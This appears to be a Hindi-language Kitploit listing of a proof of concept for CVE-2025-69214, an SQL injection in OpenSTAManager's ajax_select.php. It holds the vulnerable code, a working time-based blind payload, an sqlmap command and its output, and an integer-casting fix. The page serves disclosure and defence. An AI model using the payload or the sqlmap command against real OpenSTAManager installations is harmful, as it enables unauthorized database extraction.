Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-69214 — CVE-2025-69214 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: OpenSTAManager के ajax_select.php componenti एंडपॉइंट में SQL इंजेक्शन। इसमें कमजोर कोड विश्लेषण, SQLMap के साथ टाइम-बेस्ड ब्लाइंड शोषण, और सुधार मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/lukasz-rybak/cve-2025-69214
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

CVE-2025-69214 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: OpenSTAManager के ajax_select.php componenti एंडपॉइंट में SQL इंजेक्शन। इसमें कमजोर कोड विश्लेषण, SQLMap के साथ टाइम-बेस्ड ब्लाइंड शोषण, और सुधार मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-69214: OpenSTAManager में ajax_select.php (componenti endpoint) में SQL Injection

अवलोकन

फ़ील्डविवरण
CVE IDCVE-2025-69214
गंभीरताHIGH
परामर्शपरामर्श देखें
खोजकर्ताLukasz Rybak

प्रभावित उत्पाद

  • devcode-it/openstamanager (संस्करण: <= 2.9.8)

CWE वर्गीकरण

  • CWE-89: विशेष तत्वों का अनुचित निष्प्रभावीकरण जो SQL कमांड में उपयोग किए जाते हैं ('SQL Injection')

विवरण

सारांश

ajax_select.php एंडपॉइंट में componenti ऑपरेशन को संभालते समय SQL Injection भेद्यता मौजूद है। एक प्रमाणित हमलावर options[matricola] पैरामीटर के माध्यम से दुर्भावनापूर्ण SQL कोड इंजेक्ट कर सकता है।

प्रमाण अवधारणा

संवेदनशील कोड

फ़ाइल: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

डेटा प्रवाह

  1. स्रोत: $_GET['options']['matricola'] → $superselect['matricola']
  2. संवेदनशील: उपयोगकर्ता इनपुट बिना सैनिटाइजेशन के सीधे IN() क्लॉज में जोड़ा गया
  3. सिंक: AJAX फ्रेमवर्क के माध्यम से क्वेरी निष्पादित

शोषण

मैनुअल PoC (समय-आधारित ब्लाइंड SQLi):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
चित्र

SQLMap शोषण:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

SQLMap आउटपुट:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
चित्र

प्रभाव

  • डेटा निकासी: समय-आधारित ब्लाइंड SQL इंजेक्शन पूर्ण डेटाबेस निष्कर्षण की अनुमति देता है
  • प्रमाणीकरण बायपास: संवेदनशील घटक और उपकरण डेटा तक पहुंच
  • डेटा हेरफेर: रिकॉर्ड्स का संभावित अनधिकृत संशोधन

उपचार

SQL में उपयोग करने से पहले मानों को पूर्णांकों में बदलें:

पहले:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

बाद में:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

श्रेय

खोजकर्ता: Łukasz Rybak

संदर्भ

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

अस्वीकरण

यह CVE समन्वित भेद्यता प्रकटीकरण प्रथाओं का पालन करते हुए जिम्मेदारी से प्रकट किया गया था। यहां प्रदान की गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।

टूल डाउनलोड करें